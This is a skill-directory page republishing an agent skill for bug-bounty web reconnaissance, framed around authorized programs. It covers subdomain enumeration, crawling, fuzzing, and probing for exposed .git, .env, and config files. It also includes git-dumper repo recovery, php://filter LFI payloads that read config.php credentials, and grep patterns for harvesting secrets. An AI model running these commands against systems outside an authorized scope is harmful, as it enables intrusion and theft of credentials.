Cybersecurity
AgriciDaniel/claude-cybersecurity
Ultimate AI-powered cybersecurity code review skill. An agent skill from AgriciDaniel/claude-cybersecurity.
Web2 recon pipeline — subdomain enumeration (subfinder, Chaos API, assetfinder), live host discovery (dnsx, httpx), URL crawling (katana, waybackurls, gau), directory fuzzing (ffuf), JS analysis…
The automated check flagged lines worth reading first. See the safety section below.
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-recon --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/web2-recon .claude/skills/web2-recon && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .claude/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-reconType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-recon --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/web2-recon .agents/skills/web2-recon && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .agents/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-recon --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/web2-recon .cursor/skills/web2-recon && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .cursor/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/awarexone/Agentic-Bug-Hunter.git --path skills/web2-recon--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-recon --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/web2-recon .gemini/skills/web2-recon && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .gemini/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-reconInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/web2-recon .github/skills/web2-recon && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .github/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install awarexone/Agentic-Bug-Hunter web2-recon --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/awarexone/Agentic-Bug-Hunter.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/web2-recon .opencode/skills/web2-recon && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "web2-recon" agent skill from https://github.com/awarexone/Agentic-Bug-Hunter/tree/main/skills/web2-recon into .opencode/skills/web2-recon/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web2-recon", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
web2-reconWeb2 recon pipeline — subdomain enumeration (subfinder, Chaos API, assetfinder), live host discovery (dnsx, httpx), URL crawling (katana, waybackurls, gau), directory fuzzing (ffuf), JS analysis…
Web2 Recon is an agent skill from awarexone/Agentic-Bug-Hunter. Web2 recon pipeline — subdomain enumeration (subfinder, Chaos API, assetfinder), live host discovery (dnsx, httpx), URL crawling (katana, waybackurls, gau), directory fuzzing (ffuf), JS analysis (LinkFinder, SecretFinder), continuous monitoring (new subdomain alerts, JS change detection, GitHub commit watch). Use when starting recon on any web2 target or when asked about asset discovery, subdomain enum, or attack surface mapping.
Its SKILL.md is about 6.4k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Bug bounty, Threat modeling and Fuzzing. It works with GitHub. The repository describes itself as: AI-powered bug bounty hunting toolkit that works with or without subscription. The licence is MIT.
5 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit cd58a40. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlpython3jqgitpipghwgetpipxsqlite3awsFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
dns.projectdiscovery.ioapi.github.comcrt.shgithub.comFrom URLs in SKILL.md, links to its own repository left out.
Names these keys or tokens, usually read from environment variables:
CHAOS_API_KEYDB_PASSWORDAPP_KEYAWS_SECRETGITHUB_TOKENFrom names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Web2 Recon loads about 6.4k tokens when it runs. Until then it costs about 111 tokens; SKILL.md has 1,128 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found patterns that need a careful read before installing.
# org:TARGET_ORG .env/.bzr/branch-format /.DS_Store /.env /web.config /WEB-INF/web.xml \when they contain live secrets. A bare `.env` listing framework defaults is Info; one with a working DB password, cloud| `/.env` `/.env.local` `/.env.production` | Laravel / Node / Rails | `DB_PASSWORD`, `APP_KEY`, `AWS_*`, `STRIPE_*`, mai| `/.aws/credentials` `/.npmrc` `/.dockercfg` | misc | cloud / registry tokens |for p in /.env /web.config /WEB-INF/web.xml /application.properties /appsettings.json \Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from awarexone/Agentic-Bug-Hunter at commit cd58a40, republished under its MIT licence (© awarexone). 1,128 words, ~6,401 tokens.
.claude/skills/web2-recon/SKILL.md (or your agent's skills folder).Full asset discovery from nothing to a prioritized URL list ready for hunting.
# 1. Set your Chaos API key (get free key at chaos.projectdiscovery.io)
export CHAOS_API_KEY="your-key-here"
# Add to ~/.zshrc or ~/.bashrc for persistence:
echo 'export CHAOS_API_KEY="your-key-here"' >> ~/.zshrc
# 2. Update nuclei templates (run weekly)
nuclei -update-templates
# 3. Configure subfinder with API keys for more sources
mkdir -p ~/.config/subfinder
cat > ~/.config/subfinder/config.yaml << 'EOF'
# Get free keys at: virustotal.com, securitytrails.com, censys.io, shodan.io
virustotal: [YOUR_VT_KEY]
securitytrails: [YOUR_ST_KEY]
censys_apiid: YOUR_CENSYS_ID
censys_secret: YOUR_CENSYS_SECRET
shodan: [YOUR_SHODAN_KEY]
EOF
# 4. Verify all tools installed
which subfinder httpx dnsx nuclei katana waybackurls gau dalfox ffuf anew gf interactsh-clientIf a target shows nothing interesting after 5 minutes of recon, move on. Don't burn hours on dead surface.
5-minute kill signals:
TARGET="target.com"
# Step 0: Passive — crt.sh certificate transparency (no API key needed)
curl -s "https://crt.sh/?q=%.${TARGET}&output=json" \
| jq -r '.[].name_value' \
| sed 's/\*\.//g' \
| sort -u > /tmp/subs.txt
echo "[+] crt.sh: $(wc -l < /tmp/subs.txt) subdomains"
# Step 1: Chaos API (ProjectDiscovery — most comprehensive source)
curl -s "https://dns.projectdiscovery.io/dns/$TARGET/subdomains" \
-H "Authorization: $CHAOS_API_KEY" \
| jq -r '.[]' >> /tmp/subs.txt
echo "[+] Chaos returned $(wc -l < /tmp/subs.txt) subdomains"
# Step 2: subfinder (passive multi-source)
subfinder -d $TARGET -silent | anew /tmp/subs.txt
assetfinder --subs-only $TARGET | anew /tmp/subs.txt
echo "[+] Total subdomains after all sources: $(wc -l < /tmp/subs.txt)"
# Step 3: DNS resolution + live host check
cat /tmp/subs.txt | dnsx -silent | httpx -silent -status-code -title -tech-detect | tee /tmp/live.txt
echo "[+] Live hosts: $(wc -l < /tmp/live.txt)"
# Step 4: URL crawl
cat /tmp/live.txt | awk '{print $1}' | katana -d 3 -jc -kf all -silent | anew /tmp/urls.txt
# Step 5: Historical URLs
echo $TARGET | waybackurls | anew /tmp/urls.txt
gau $TARGET --subs | anew /tmp/urls.txt
echo "[+] Total URLs: $(wc -l < /tmp/urls.txt)"
# Step 6: Nuclei scan
nuclei -l /tmp/live.txt -t ~/nuclei-templates/ -severity critical,high,medium -o /tmp/nuclei.txtTARGET="target.com"
RECON_DIR="recon/$TARGET"
mkdir -p $RECON_DIR
# All outputs go here:
/tmp/subs.txt → $RECON_DIR/subdomains.txt
/tmp/live.txt → $RECON_DIR/live-hosts.txt
/tmp/urls.txt → $RECON_DIR/urls.txt
/tmp/nuclei.txt → $RECON_DIR/nuclei.txt# Parameters worth testing
cat /tmp/urls.txt | grep -E "[?&](id|user|file|path|url|redirect|next|src|token|key|api_key)=" | tee /tmp/interesting-params.txt
# API endpoints
cat /tmp/urls.txt | grep -E "/api/|/v1/|/v2/|/v3/|/graphql|/rest/|/gql" | tee /tmp/api-endpoints.txt
# File upload endpoints
cat /tmp/urls.txt | grep -E "upload|file|attachment|document|image|avatar|photo|media" | tee /tmp/uploads.txt
# Admin/internal paths
cat /tmp/urls.txt | grep -E "/admin|/internal|/debug|/test|/staging|/dev|/management|/console" | tee /tmp/admin-paths.txt
# Authentication endpoints
cat /tmp/urls.txt | grep -E "/oauth|/login|/auth|/sso|/saml|/oidc|/callback|/token" | tee /tmp/auth-paths.txt# Install gf patterns: https://github.com/tomnomnom/gf
cat /tmp/urls.txt | gf xss | tee /tmp/xss-candidates.txt
cat /tmp/urls.txt | gf ssrf | tee /tmp/ssrf-candidates.txt
cat /tmp/urls.txt | gf idor | tee /tmp/idor-candidates.txt
cat /tmp/urls.txt | gf sqli | tee /tmp/sqli-candidates.txt
cat /tmp/urls.txt | gf redirect | tee /tmp/redirect-candidates.txt
cat /tmp/urls.txt | gf lfi | tee /tmp/lfi-candidates.txt
cat /tmp/urls.txt | gf rce | tee /tmp/rce-candidates.txt
# User-controlled CSS surface (themes, profile pages, HTML email renderers,
# rich-text editors, PDF generators). gf has no pattern for this — grep manually:
cat /tmp/urls.txt | grep -iE "theme|profile|signature|customize|email|invoice|pdf|render|markdown" \
| tee /tmp/css-injection-candidates.txt
# → if any hit, run web2-vuln-classes **CSS Injection**# Activate venv
source ~/tools/SecretFinder/.venv/bin/activate
# Scan a single JS file
python3 ~/tools/SecretFinder/SecretFinder.py -i "https://target.com/static/js/main.js" -o cli
# Scan all JS URLs found in recon
cat /tmp/urls.txt | grep "\.js$" | head -50 | while read url; do
echo "=== $url ==="
python3 ~/tools/SecretFinder/SecretFinder.py -i "$url" -o cli 2>/dev/null
done
deactivatesource ~/tools/LinkFinder/.venv/bin/activate
# Single JS file
python3 ~/tools/LinkFinder/linkfinder.py -i "https://target.com/app.js" -o cli
# All pages (crawls JS from HTML)
python3 ~/tools/LinkFinder/linkfinder.py -i "https://target.com" -d -o cli
deactivate# Directory discovery on a live host
ffuf -u "https://target.com/FUZZ" \
-w ~/wordlists/common.txt \
-mc 200,201,204,301,302,307,401,403 \
-ac \
-t 40 \
-o /tmp/ffuf-dirs.json
# API endpoint discovery
ffuf -u "https://target.com/api/FUZZ" \
-w ~/wordlists/api-endpoints.txt \
-mc 200,201,204,301,302 \
-ac \
-t 20
# IDOR fuzzing with authenticated request
# Create req.txt with Authorization: Bearer TOKEN
ffuf -request /tmp/req.txt \
-request-proto https \
-w <(seq 1 10000) \
-fc 404 \
-ac \
-t 10Score before spending time. Skip if score < 4.
| Criterion | Points |
|---|---|
| Max bounty >= $5K | +2 |
| Large user base (>100K) or handles money | +2 |
| Program launched < 60 days ago | +2 |
| Complex features: API, OAuth, file upload, GraphQL | +1 |
| Recent code/feature changes (GitHub, changelog) | +1 |
| Private program (less competition) | +1 |
| Tech stack you know | +1 |
| Source code available | +1 |
| Prior disclosed reports to study | +1 |
< 4: Skip 4-5: Only if nothing better available 6-8: Good — spend 1-3 days >= 9: Excellent — spend up to 1 week
# Response headers reveal backend
curl -sI https://target.com | grep -iE "server|x-powered-by|x-aspnet|x-runtime|x-generator"
# Common signals:
# Server: nginx + X-Powered-By: PHP/7.4 → PHP backend
# Server: gunicorn OR X-Powered-By: Express → Python/Node.js
# X-Powered-By: ASP.NET → .NET
# Server: Apache Tomcat → Java
# X-Runtime: Ruby → Ruby on Rails
# Framework from JS bundle paths:
# /_next/static/ → Next.js
# /static/js/main.chunk.js → CRA (React)
# /packs/ → Ruby on Rails + Webpacker
# /__nuxt/ → Nuxt.js (Vue)| Stack | Hunt First | Hunt Second |
|---|---|---|
| Ruby on Rails | Mass assignment | IDOR (:id routes) |
| Django | IDOR (ModelViewSet, no object perms) | SSTI (mark_safe) |
| Flask | SSTI (render_template_string) | SSRF (requests lib) |
| Laravel | Mass assignment ($fillable) | IDOR (Eloquent, no ownership) |
| Express (Node.js) | Prototype pollution | Path traversal + debug surface (/_debug, /__debug__) → web2-vuln-classes "Error Disclosure / Debug Endpoints" |
| Spring Boot | Actuator endpoints → web2-vuln-classes "Error Disclosure / Debug Endpoints" for full surface | SSTI (Thymeleaf) |
| ASP.NET | ViewState deserialization (if encrypted, also test padding-oracle path → web2-vuln-classes Padding Oracle & Crypto Misuse) | Open redirect (ReturnUrl) |
| Next.js | SSRF via Server Actions + /_next/data/ / /_next/static/chunks/ → web2-vuln-classes "Error Disclosure / Debug Endpoints" | Open redirect via redirect() |
| GraphQL | Introspection → auth bypass on mutations | IDOR via node(id:) |
| WordPress | Plugin SQLi | REST API auth bypass |
| SPA frameworks (React / Vue / Svelte / Angular) | DOM XSS sinks via state/router → web2-vuln-classes section 3 "postMessage Testing" for cross-frame entry points | Client-side route auth bypass (role check only in JS) |
Set up once per target. Alerts you before other hunters.
#!/bin/bash
TARGET="target.com"
KNOWN="/tmp/$TARGET-subs-known.txt"
subfinder -d $TARGET -silent > /tmp/$TARGET-subs-fresh.txt
curl -s "https://dns.projectdiscovery.io/dns/$TARGET/subdomains" \
-H "Authorization: $CHAOS_API_KEY" \
| jq -r '.[]' >> /tmp/$TARGET-subs-fresh.txt
# Diff against known
NEW=$(comm -23 <(sort /tmp/$TARGET-subs-fresh.txt) <(sort $KNOWN 2>/dev/null))
if [ -n "$NEW" ]; then
echo "NEW SUBDOMAINS: $NEW"
echo "$NEW" >> $KNOWN
fi
# Schedule: crontab -e → 0 8 * * * /bin/bash ~/monitors/subs-watch.sh#!/bin/bash
REPO="TargetOrg/target-app"
LAST_SHA="/tmp/$REPO-last-sha.txt"
CURRENT=$(curl -s "https://api.github.com/repos/$REPO/commits?per_page=1" | jq -r '.[0].sha')
KNOWN=$(cat $LAST_SHA 2>/dev/null)
if [ "$CURRENT" != "$KNOWN" ]; then
echo "New commit on $REPO: $CURRENT"
echo $CURRENT > $LAST_SHA
# Get changed files
curl -s "https://api.github.com/repos/$REPO/commits/$CURRENT" \
| jq -r '.files[].filename' | grep -E "auth|middleware|route|permission|role|admin"
fi
# Schedule: */30 * * * * /bin/bash ~/monitors/github-watch.sh# naabu — fast port scanner from ProjectDiscovery
# Finds non-standard ports: 8080, 8443, 3000, 8888, 9000, etc.
cat /tmp/live.txt | awk '{print $1}' | naabu -port 80,443,8080,8443,3000,4000,5000,8000,8888,9000,9090,9200,6379 -silent | tee /tmp/open-ports.txt
# Why this matters: admin panels, debug services, internal APIs often run on alt ports
# Example wins: :8080/actuator/env (Spring Boot), :9200/_cat/indices (Elasticsearch), :6379 (Redis)# trufflehog — high-signal secret detection with entropy analysis
# Scans JS files and git repos
pip install trufflehog3 2>/dev/null || true
trufflehog filesystem --only-verified recon/$TARGET/ 2>/dev/null
# SecretFinder — manual JS bundle scan (already in tools/)
source ~/tools/SecretFinder/.venv/bin/activate
cat /tmp/urls.txt | grep "\.js$" | head -100 | while read url; do
python3 ~/tools/SecretFinder/SecretFinder.py -i "$url" -o cli 2>/dev/null
done
deactivate
# Quick grep for common patterns in downloaded JS
wget -q -r -l 1 -A "*.js" -P /tmp/js-files/ "https://$TARGET" 2>/dev/null
grep -rn "api_key\|apiKey\|client_secret\|access_token\|private_key\|AWS_SECRET\|AKIA" /tmp/js-files/ 2>/dev/null# Search GitHub for hardcoded secrets before hunting the app
TARGET_ORG="TargetOrgName" # Check their GitHub org
# Useful dorks (search on github.com):
# org:TARGET_ORG password
# org:TARGET_ORG api_key
# org:TARGET_ORG "Authorization: Bearer"
# org:TARGET_ORG .env
# org:TARGET_ORG "BEGIN RSA PRIVATE KEY"
# CLI with gh (GitHub CLI):
gh search code "api_key" --owner "$TARGET_ORG" --json path,repository 2>/dev/null | jq '.'
gh search code "password" --owner "$TARGET_ORG" --json path,repository 2>/dev/null | head -20
# GitDorker (if installed):
python3 ~/tools/GitDorker/GitDorker.py -t GITHUB_TOKEN -d ~/tools/GitDorker/Dorks/alldorksv3 -q "$TARGET" -orgRecovering an app's source code is one of the highest-leverage recon moves: it converts blind black-box hunting into white-box review. A bare directory-listing or exposed file is usually Low/Info on its own — it becomes Medium/High/Critical the moment the recovered source yields hardcoded secrets, a confirmed injectable sink, or auth logic you can now bypass with certainty.
Disclosure is not the bug. The bug is what the disclosure enables. Always ask: "With this source/config in hand, can I prove a concrete attack RIGHT NOW?" If the dump is empty or contains only public framework code, it's an N/A — kill it.
# One-shot probe of the highest-signal disclosure paths across all live hosts.
# Only 200s with non-empty bodies are worth a human look.
for host in $(awk '{print $1}' /tmp/live.txt); do
for p in /.git/HEAD /.git/config /.svn/wc.db /.svn/entries /.hg/requires \
/.bzr/branch-format /.DS_Store /.env /web.config /WEB-INF/web.xml \
/application.properties /config.php.bak /backup.zip /.git/logs/HEAD; do
code=$(curl -s -o /dev/null -w "%{http_code}" "$host$p")
[ "$code" = "200" ] && echo "[HIT] $code $host$p"
done
done | tee /tmp/disclosure-hits.txt
# nuclei has curated templates for this — run alongside the manual sweep
nuclei -l /tmp/live.txt -tags exposure,config,git,backup -severity info,low,medium,high -o /tmp/exposure.txtA reachable .git/ (or .svn/.hg/.bzr) lets you reconstruct the entire repo + commit history — and history is where deleted secrets, old credentials, and removed debug endpoints live. Reporting ".git/HEAD returns 200" with no dump is a weak Low; reporting the recovered source + a secret pulled from it is a strong finding.
# --- Git (most common) ---
# git-dumper reconstructs the working tree even when directory listing is OFF.
pipx install git-dumper # or: pip install git-dumper
git-dumper "https://target.com/.git/" /tmp/dump-target
# Then mine the recovered repo:
cd /tmp/dump-target
git log --all --oneline # every commit, including reverted ones
git log -p --all | grep -iE "password|secret|api[_-]?key|token|BEGIN .*PRIVATE KEY"
git show $(git rev-list --all) # walk objects if checkout is partial
# GitTools (alt) — gitdumper.sh grabs objects, extractor.sh rebuilds commits
# Useful when git-dumper chokes on a broken index:
~/tools/GitTools/Dumper/gitdumper.sh "https://target.com/.git/" /tmp/dump-gt
~/tools/GitTools/Extractor/extractor.sh /tmp/dump-gt /tmp/dump-gt-src
# Quick sanity test before dumping: is the pack/objects tree actually served?
curl -s "https://target.com/.git/config" # remote URL → confirms real repo
curl -s "https://target.com/.git/logs/HEAD" # ref log → commit SHAs to pull
# --- SVN ---
# SVN 1.7+ stores everything in a single SQLite DB. Pull it, then read pristine blobs.
curl -s "https://target.com/.svn/wc.db" -o /tmp/wc.db
sqlite3 /tmp/wc.db "SELECT local_relpath, checksum FROM NODES;" # file list + blob hashes
# Pristine objects live at /.svn/pristine/<2-char>/<sha1>.svn-base
# SVN ≤1.6 instead exposes /.svn/entries (plaintext file list) + /.svn/text-base/*.svn-base
# Tooling: svn-extractor / dvcs-ripper rip-svn
# --- Mercurial (.hg) and Bazaar (.bzr) ---
# Confirm presence then dump with dvcs-ripper:
curl -s "https://target.com/.hg/requires" # hg fingerprint
curl -s "https://target.com/.bzr/branch-format" # bzr fingerprint
~/tools/dvcs-ripper/rip-hg.pl -v -u https://target.com/.hg/
~/tools/dvcs-ripper/rip-bzr.pl -v -u https://target.com/.bzr/If the repo dumps but contains only vendored framework code with no secrets and no app logic, that's an Info disclosure at best. Don't pad your N/A ratio — chain it to a real secret/sink or drop it.
.DS_Store — recursive directory map without brute forcemacOS drops a .DS_Store in committed folders; deployed to a web root it leaks the exact filenames in each directory. Recurse it to map hidden admin panels, backup files, and source paths that ffuf would never guess.
# ds_store_exp parses each .DS_Store, then fetches and recurses into the names it finds.
pip install ds-store # provides the parser
python3 ~/tools/ds_store_exp/ds_store_exp.py "https://target.com/.DS_Store"
# It writes the recovered tree to ./<target>/ — grep it for the good stuff:
grep -rilE "backup|admin|config|\.sql|\.zip|\.bak|internal|test" ./target.com/
# Manual parse if you only have one file (no listing/recursion):
curl -s "https://target.com/.DS_Store" -o /tmp/dsstore && strings /tmp/dsstore | sort -u
# Each readable name is a real sibling file/dir → feed back into the triage scan.Editors and lazy deploys leave shadow copies that bypass the interpreter and serve raw source. index.php.bak or .index.php.swp returns plaintext PHP that a normal index.php request would execute and hide.
# Build a candidate list from paths you already know (live URLs + recovered source).
# Mutate each known file with backup/temp extensions, then ffuf against the host.
cat /tmp/urls.txt | unfurl paths | sort -u > /tmp/known-paths.txt
# ffuf: fuzz the EXTENSION on a known basename (e.g. config)
ffuf -u "https://target.com/configFUZZ" \
-w <(printf '%s\n' .bak .old .orig .save .swp .swo .tmp .txt '~' .1 .copy .inc .dist .sample) \
-mc 200 -ac -t 20
# ffuf: append archive extensions to the bare hostname + common roots (full-site dumps)
ffuf -u "https://target.com/FUZZ" \
-w <(for n in backup bkp www web site app source release dist html public_html "$(echo target)"; do
for e in .zip .tar.gz .tar .rar .7z .tgz .sql .sql.gz; do echo "$n$e"; done; done) \
-mc 200 -ac -fs 0 -t 20 # -fs 0 drops empty 200s
# Vim swap recovery: .<name>.swp → recover original with vim -r
curl -s "https://target.com/.index.php.swp" -o /tmp/index.php.swp && vim -r /tmp/index.php.swp
# SecLists has purpose-built lists — prefer them over hand-rolling at scale:
# Discovery/Web-Content/BackupFiles.fuzz.txt (FUZZ-templated, mutates basenames)
# Discovery/Web-Content/raft-large-files.txt
ffuf -u "https://target.com/FUZZ" -w ~/wordlists/SecLists/Discovery/Web-Content/BackupFiles.fuzz.txt \
-mc 200 -ac -fs 0 -t 30php://filter and .phpsIf you have an LFI / file-include sink (a ?page=, ?file=, ?template= parameter — see the LFI candidates from gf), you can read PHP source instead of executing it by base64-wrapping it through php://filter. Recovered source then feeds straight into vuln hunting (find the real RCE/SQLi sink).
# Base64-encode the target file so the interpreter returns source, not executed output.
curl -s "https://target.com/?page=php://filter/convert.base64-encode/resource=index.php" \
| grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d # → raw index.php source
# Read config files holding DB creds / API keys (this is what escalates severity):
curl -s "https://target.com/?page=php://filter/convert.base64-encode/resource=config.php" \
| grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d
# If allow_url_include is on, php://filter can also chain to RCE — note it, then test
# carefully under program rules (see SSRF / file-include classes in web2-vuln-classes).
# .phps — some servers map .phps to a syntax-highlighted source view. Try it on every
# script you can name (no LFI needed):
curl -s "https://target.com/index.phps" -o /tmp/index.phps # serves highlighted source
for f in index config admin login db; do
curl -s -o /dev/null -w "%{http_code} $f.phps\n" "https://target.com/$f.phps"
doneThese files map 1:1 to a payout when they contain live secrets. A bare .env listing framework defaults is Info; one with a working DB password, cloud key, or signing secret is High/Critical (verify the key works — see SECRET SCANNING IN JS BUNDLES for verification flow).
| File | Stack | What's inside (escalation) |
|---|---|---|
/.env /.env.local /.env.production | Laravel / Node / Rails | DB_PASSWORD, APP_KEY, AWS_*, STRIPE_*, mail creds |
/web.config /connectionStrings.config | ASP.NET / IIS | DB connection strings, machineKey (→ ViewState RCE — see padding-oracle class) |
/WEB-INF/web.xml /WEB-INF/classes/*.properties | Java / Spring | jdbc.properties, datasource creds, internal servlet mappings |
/application.properties /application.yml | Spring Boot | DB creds, management.endpoints exposure (→ Actuator, see Error Disclosure / Debug Endpoints) |
/config.php /wp-config.php /configuration.php | PHP / WP / Joomla | DB creds, auth salts, secret keys |
/appsettings.json /secrets.json | .NET Core | connection strings, JWT signing keys, client secrets |
/.aws/credentials /.npmrc /.dockercfg | misc | cloud / registry tokens |
# Pull each candidate and immediately scan the body for live-looking secrets.
for p in /.env /web.config /WEB-INF/web.xml /application.properties /appsettings.json \
/config.php /wp-config.php /configuration.php /.git/config; do
body=$(curl -s "https://target.com$p")
echo "$body" | grep -iqE "password|secret|api[_-]?key|aws|jdbc|connectionstring|begin .*private key" \
&& echo "[SECRET?] https://target.com$p"
done
# WEB-INF/web.xml is shielded by the servlet container — usually only reachable via a
# path-traversal/LFI sink, NOT a direct request. If you can read it, you almost certainly
# have a traversal bug worth far more than the disclosure itself.Recon hands you the source; the payout comes from the review. Run this on any recovered repo/config:
SRC=/tmp/dump-target
# 1) Secrets in tracked files AND in git history (deleted ≠ gone)
trufflehog filesystem --only-verified "$SRC"
git -C "$SRC" log -p --all 2>/dev/null | grep -iE "password|secret|api[_-]?key|token|AKIA|-----BEGIN"
# 2) Dangerous sinks → confirm an injectable path, then test it live
grep -rnE "eval\(|assert\(|system\(|exec\(|popen\(|unserialize\(|pickle\.loads|yaml\.load|Runtime\.exec" "$SRC"
grep -rnE "(SELECT|INSERT|UPDATE).+\\\$_(GET|POST|REQUEST)|\\.format\(.*request|f\"SELECT" "$SRC" # SQLi candidates
grep -rnE "include|require|render_template_string|fopen\(.*\\\$_" "$SRC" # LFI / SSTI
# 3) Auth logic you can now bypass with certainty (hardcoded checks, weak JWT secret,
# debug flags, default admin creds, IP allowlists, signature verification gaps)
grep -rniE "debug *= *true|is_admin|jwt.*secret|verify=False|disable.*auth|backdoor|TODO|FIXME" "$SRC"
# 4) Internal hostnames / endpoints not in your URL list → new attack surface (+ SSRF targets)
grep -rohE "https?://[a-zA-Z0-9.-]+(:[0-9]+)?(/[^\"' ]*)?" "$SRC" | sort -uSeverity ladder for a report:
path returns 200= Info →recovered full source= Low →+ verified secret OR confirmed exploitable sink (SQLi/RCE/auth bypass)= High/Critical. Submit at the top of the ladder you can prove, never the bottom.
Pattern seen on HackerOne / Bugcrowd: exposed .git directories dumped to full source, then mined for hardcoded credentials in commit history → account takeover / admin access (e.g. the U.S. DoD .git exposure report, hackerone.com/reports/1624157). .DS_Store recursion has paid out for revealing backup archives and debug-mode internal panels that direct fuzzing missed. Do not invent dollar figures — frame the impact, prove the chain, and let the program set the bounty.
Note:
- ALL in-scope assets (every domain listed)
- Out-of-scope list (read carefully — common trap)
- Safe harbor statement
- Impact types accepted (some exclude "low")
- Average bounty amount (signals program generosity)Run the standard pipeline above. Focus on live.txt output.
